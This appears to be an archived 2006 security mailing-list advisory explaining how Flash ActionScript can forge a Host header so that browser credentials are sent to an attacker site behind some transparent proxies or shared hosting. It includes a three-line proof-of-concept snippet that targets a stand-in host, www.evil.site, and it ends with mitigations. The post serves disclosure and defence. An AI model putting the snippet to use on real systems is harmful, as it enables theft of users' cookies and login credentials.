Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Technical note: under some conditions, it's possible to steal HTTP crede

from [Amit Klein (AKsecurity)] Network Security [Permanent Link]
Subject: Technical note: under some conditions, it's possible to steal HTTP credentials using Flash
Date: Mon, 14 Aug 2006 20:52:45 +0200 
Technical note: under some conditions, it's possible to steal HTTP credentials 
using Flash  
(requires IE + some transparent proxies or virtual hosting)

The method described here is pretty simple. It works
though only on HTTP (not HTTPS) credentials. Also, it
works only when the client browses (using IE) through certain
types of transparent proxies (or the target server is
virtually hosted together with an attacker site).

The idea is to force a Host request header, using
Flash (this idea was presented in "Forging HTTP request headers with Flash",
http://www.securityfocus.com/archive/1/441014). A victim
(browser) is presented with a Flash resource (say,
http://www.evil.site/attack.swf) that contains the
following ActionScript code:

var req:LoadVars=new LoadVars();
req.addRequestHeader("Host:","www.evil.site");
req.send("http://www.target.site/some/path/","_blank";);

The browser assumes that the request goes to
http://www.target.site/some/path/, so it adds whatever
credentials that are relevant (non secure cookies -
including HttpOnly cookies, HTTP basic auth, etc.).
But the actual request has a different Host header.
The request goes to the IP address of www.target.site.
However, a transparent proxy (e.g. one operated by the
victim's ISP, intercepting all port 80 traffic) may
disregard the original destination IP address and send
the request to the IP address of www.evil.site (I 
noticed some popular transparent proxies do that). Even
if no such proxy server exists, the attacker may
acquire web presence on the same IP address with
www.target.site, park the domain www.evil.site there,
and when the request arrives to the web server, it
will go to www.evil.site.

Note that the Host header modification in order to
steal credentials was discussed in "XS(T) attack variants
which can, in some cases,eliminate the need for TRACE", 
http://www.securityfocus.com/archive/107/308433, yet at that
time it seemed that the only way to force such header
was from XmlHttpRequest, which necessiates XSS
condition (due to the "same origin" policy). With
Flash, this same origin policy doesn't apply, hence no
need for XSS condition.


Recommendation: 
1. Use SSL (HTTPS), and set the secure bit of the cookie accordingly.
2. Do not use virtual hosting with possibly malicious websites.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Technical note: under some conditions, it's possible to steal HTTP credentials using Flash, Amit Klein (AKsecurity) <=
Previous by Date:  [Full-disclosure] RE: ANNOUNCING: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA, Dave Wichers
Next by Date:  (somewhat) breaking the same-origin policy by undermining dns-pinning, Martin Johns
Previous by Thread:  [Full-disclosure] RE: ANNOUNCING: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA, Dave Wichers
Next by Thread:  (somewhat) breaking the same-origin policy by undermining dns-pinning, Martin Johns
Indexes:  [Date] [Thread] [Top] [All Lists]